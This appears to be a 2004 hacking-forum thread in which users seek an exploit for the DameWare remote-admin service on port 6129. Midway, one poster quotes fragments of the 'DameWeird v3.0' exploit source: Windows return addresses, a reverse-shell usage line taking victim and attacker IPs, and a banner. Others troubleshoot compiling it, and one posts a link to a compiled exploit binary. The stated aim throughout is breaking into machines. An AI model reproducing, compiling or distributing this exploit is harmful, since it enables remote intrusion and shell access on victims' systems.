Somone can tell me why port 6129 scan is getting popular again. ? I think there is a new exploit out there ! are there somone who can tell me if its true ? And if its is where is the exploit ? cant fint it on google
or use the search button. they have it in the download sectioopn here compiled
ShouiZen
Jul 24 2004, 02:20 PM
hi, man This hole is died man!!!! already patched man!!!
Sincerely, Shouizen
mathofaka
Jul 24 2004, 11:01 PM
wow this is been dead for aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa while
try the WU exploit
prog
Jul 25 2004, 05:59 AM
wu?
ZakOpath
Jul 25 2004, 07:54 AM
Year what do WU stans for ?
But i dont understand why some ppl are requesting 6129 scans again :7
ZoraX
Jul 25 2004, 04:08 PM
maybe there is a private exploit for the latest version? Ask the person that are requesting the scan?
irjenier
Jul 26 2004, 01:37 AM
A BiG Problem.. ive try'd to compile the source and it looks to me very fine.. but it gives me errors and dump one's take a look:
CODE
Compiler: Default compiler Executing gcc.exe... gcc.exe "C:\Documents and Settings\DmX\Local Settings\Temporary Internet Files\Content.IE5\0TW34N0J\DameWeird[1].c" -o "C:\Documents and Settings\DmX\Local Settings\Temporary Internet Files\Content.IE5\0TW34N0J\DameWeird[1].exe" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x8e):DameWeird[1].c: undefined reference to `socket@12' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xc7):DameWeird[1].c: undefined reference to `inet_addr@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xda):DameWeird[1].c: undefined reference to `htons@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xec):DameWeird[1].c: undefined reference to `gethostbyname@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x127):DameWeird[1].c: undefined reference to `inet_addr@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x172):DameWeird[1].c: undefined reference to `connect@12' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x1da):DameWeird[1].c: undefined reference to `inet_addr@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x246):DameWeird[1].c: undefined reference to `htons@4' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x743):DameWeird[1].c: undefined reference to `recv@16' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x79b):DameWeird[1].c: undefined reference to `send@16' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x7f4):DameWeird[1].c: undefined reference to `recv@16' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xb75):DameWeird[1].c: undefined reference to `send@16' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xba4):DameWeird[1].c: undefined reference to `recv@16' C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xf85):DameWeird[1].c: undefined reference to `WSAStartup@8'
Execution terminated
now i use dev-cpp 94810 newest and i dont get it.. i mean why it wont compile... i yry'd borland and it says cant read ws2_32.OBJ means i dont have the godamn thing.. ANOYING! need help!!! can some1 put a compiled source here.. ill be greatfull. tnx
prog
Jul 26 2004, 03:47 AM
Post the source, maybe i can compile it
twistedps
Jul 26 2004, 05:20 AM
QUOTE (ZakOpath @ Jul 25 2004, 07:54 AM)
Year what do WU stans for ?
But i dont understand why some ppl are requesting 6129 scans again :7
wuftpd maybe..
then again people could always try reading advisories and writing their own code, so they dont have to rely on others as much to break into stuff... and dameware is long gone, but a new exploit could always be circulating.
/* 0x717564B8 jmp esp in comctl32.dll win2k fr adv srv sp2 win2k en adv srv sp3 win2k en adv srv sp4 win2k en srv sp3 win2k fr pro sp3 win2k en pro sp4 */
#define RET_XP_VAR0 "\x07\xD5\x36\x77" #define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these offsets has been reported by many people #define RET_XP_VAR2 "\xC1\x1C\x39\x77" #define RET_WIN2k "\xB8\x64\x75\x71"
if(buffer[0]!=0x32||buffer[1]!=0x11) { printf("Patched\r\n"); return -1; } printf("Done\r\n"); printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport); return 0; }
void banner(void) { printf("\r\n [29a] Originaly Coded By JENiER DameWeird v3.0 Universal Exploit [29a] \r\n"); printf("\t\t You Know Where We aT \r\n\r\n"); return; } void syntax(char *prog) { printf("syntax: %s <Victims-iP> <Your-iP> <Shell-Port> [winXP variant]\r\n",prog); printf("winXP variante:\r\n"); printf(" 0 will use 0x7736d50c as eip [found on most XPs][default]\r\n"); printf(" 1 will use 0x77351cc1 as eip [found on many XPs]\r\n"); return; } int main(int argc, char *argv[]) { WSADATA wsaData; int sock,var=0;
in your compiler you may have to include the winsock library ws_32.lib for defines and functions in the includes to be recognised by the linker when compiling its generally located in the lib directory of your compiler but isnt always added by default you just have to find the part of the config in your compiler where you can add this library to the libraries which it will link to when you compile this code ie: VC++ has project->settings->link
irjenier
Jul 26 2004, 07:21 AM
tnx for ur help but i still have problem to compile it iven when i play in the linker option section i use dev-cpp and borlan cpp 5.5 and in botland it gives me less errorlike 4 instead of 14 but it also says this..
CODE
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland DameWeird.c: Warning W8004 DameWeird.c 88: 'ip1' is assigned a value that is never used in function set_sc Warning W8004 DameWeird.c 88: 'port_to_shell' is assigned a value that is never used in function set_sc Warning W8004 DameWeird.c 208: 'i' is assigned a value that is never used in function start_auth Warning W8004 DameWeird.c 199: 'size' is assigned a value that is never used in function start_auth Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland Fatal: Unable to open file 'WS2_32.OBJ'
prog
Jul 26 2004, 05:08 PM
hxxp://puffpuffgive.net/blah.exe
rename it to whatever you wish i used VS 6, didnt need to add that lib either
what exact version of DW does this sploit?
G777
Jul 26 2004, 06:24 PM
isnt this the old dameweird exploit
mortello
Jul 26 2004, 07:55 PM
yeah, and it was a good one too....around Xmas....
Gotenks
Jul 27 2004, 11:38 AM
Thnx for the share prog!
Ciao! Got
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.